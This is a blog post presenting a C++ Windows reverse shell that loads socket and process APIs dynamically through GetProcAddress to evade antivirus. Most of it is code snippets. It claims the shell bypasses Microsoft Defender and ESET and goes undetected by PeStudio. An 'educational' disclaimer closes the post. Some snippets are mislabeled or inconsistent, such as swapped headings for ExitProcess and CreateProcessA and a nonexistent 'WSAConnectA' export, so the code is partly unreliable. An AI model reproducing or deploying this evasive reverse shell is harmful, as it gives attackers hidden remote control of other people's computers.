C++ Reverse Shell attempting obfuscation while dynamically loading API.

 C++ Reverse Shell Attempting Obfuscation While Dynamically Loading Windows API


This time, I wrote a Reverse Shell in C++, attempting to bypass AV by loading Windows APIs dynamically.
Sadly, this time I could not use antiscan.me to test this Shell since that site is not working anymore.

The Reverse Shell uses the following Windows API:
  • LoadLibraryA
  • GetProcAddress
  • WSAStartup
  • WSASocketA
  • WSAConnectA
  • CreateProcessA
  • ExitProcess
Every API has been loaded dynamically to try to bypass AV controls.

Loading Windows API Dynamically:

How to Read the Following Paragraph

// Creating the signature of the function
// Creating an instance of the function
// Calling the function 

LoadLibraryA Becomes loader

using loader = HMODULE(__stdcall*)(LPCSTR);

loader loader_a = reinterpret_cast<loader>((FARPROC)GetProcAddress(LoadLibraryA(x), "LoadLibraryA"));

getter getter_a = reinterpret_cast<getter>((FARPROC)GetProcAddress(loader_a(x), "GetProcAddress"));

GetProcAddress Becomes getter

using getter = FARPROC(__stdcall*)(HMODULE, LPCSTR);

getter getter_a = reinterpret_cast<getter>((FARPROC)GetProcAddress(loader_a(x), "GetProcAddress"));

wsa_1 wsa_a = reinterpret_cast<wsa_1>((FARPROC)getter_a(loader_a(y), "WSAStartup"));

WSAStartup Becomes wsa_1

using wsa_1 = int(__stdcall*)(WORD, LPWSADATA);

wsa_1 wsa_a = reinterpret_cast<wsa_1>((FARPROC)getter_a(loader_a(y), "WSAStartup"));

wsa_a(a, &b);

WSASocketA Becomes wsa_2

using wsa_2 = SOCKET (__stdcall*)(int, int, int, LPWSAPROTOCOL_INFOA, DWORD, DWORD); 

wsa_2 wsa_b = reinterpret_cast<wsa_2>((FARPROC)getter_a(loader_a(y), "WSASocketA"));

SOCKET s = wsa_b(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);

WSAConnectA Becomes wsa_3

using wsa_3 = int(__stdcall*)(SOCKET, const sockaddr*, int, LPWSABUF, LPWSABUF, int, int); 

wsa_3 wsa_c = reinterpret_cast<wsa_3>((FARPROC)getter_a(loader_a(y), "WSAConnectA"));

wsa_c(s, (sockaddr *)&server, sizeof(server), nullptr, nullptr, NULL, NULL);

ExitProcess Becomes cp

using cp = bool(__stdcall*)(LPCSTR, LPSTR, LPSECURITY_ATTRIBUTES, LPSECURITY_ATTRIBUTES, BOOL, DWORD, LPVOID, LPCSTR, LPSTARTUPINFOA, LPPROCESS_INFORMATION);

cp cp_a = reinterpret_cast<cp>((FARPROC)getter_a(loader_a(y), "CreateProcessA"));

cp_a(NULL, cmd, NULL, NULL, FALSE, 0, NULL, NULL, &startupInfo, &processInfo);

CreateProcessA Becomes  ep

using ep = void(__stdcall*)(UINT);

ep ep_a = reinterpret_cast<ep>((FARPROC)getter_a(loader_a(x), "TerminateProcess"));

ep_a(0);

The Code:

The PoC:



What We Achieved so far:

So far, we are certain that we have successfully bypassed Microsoft Defender and the antivirus known as ESET. Furthermore, we have determined that tools like PeStudio do not detect the usage of the Windows API we employed, as you can see in the screenshot below. Unfortunately, certain APIs, like TerminateProcess, are present due to some compiler magic. You can test this even with a simple 'Hello, World!' snippet.



**This Article is only for informational/Educational porpouse**

Commenti

Posta un commento

Post popolari in questo blog

Notes on an ASM X64 Reverse Shell

Immagine
  Notes an ASM X64 Reverse Shell This article is a collection of Resources that i used to create a x64 reverse shell in pure ASM. Furthermore you can find the code that I wrote commented line by line.   The Resources: The starting point Windows X64 calling convention GetProcAddress WSAstartup WSASocketA Sockaddr WSAConnect CreateProcessA STARTUPINFOA ExitProcess The Steps: Finding Kernel32.dll Address Parsing Kernel32.dll to find GetProcAddress API  Using GetProcAddress to find LoadLibrary API Loading the ws2_32.dll Using GetProcAddress to locate and store WSAStartup address Using GetProcAddress to locate and store WSASocketA address Using GetProcAddress to locate and store WSAConnect address Using GetProcAddress to locate and store CreateProcessA address Using GetProcAddress to locate and store ExitProcess address Calling WSAstartup() Calling WSASocketa() Creating the sockaddr structure Calling WSAConnect() Pushing cmd.exe string to stack Setting STARTUPINFOA Structure Calling CreateP
Continua a leggere

KeePass abbiamo un problema..../KeePass we have a Problem

Immagine
KeePass abbiamo un problema  ITA: Si dice che la curiosità uccida il gatto , per fortuna non è questo il caso. In un momento di sana follia ho deciso di analizzare l'eseguibile "KeePass 2" , chi non lo usa per lavoro!? Analizzando l'eseguibile con il tool open-source "Detect it Easy" ho scoperto che il tool utilizza un obfuscator in particolare "Eziriz .NET Reactor 6.X" nulla di entusiasmante finché non ho notato che la versione utilizzata da KeePass è crackata e distribuita dal noto store di Software crackati Dr. Far Far. Il sito Dr. Far Far è noto anche perché in omaggio ai clienti regala malware a volontà. Link to Detect it Easy:https://github.com/horsicq/Detect-It-Easy/ Thanks to everyone from the etetrnal n00b Marco Nappi aka Xaliom
Continua a leggere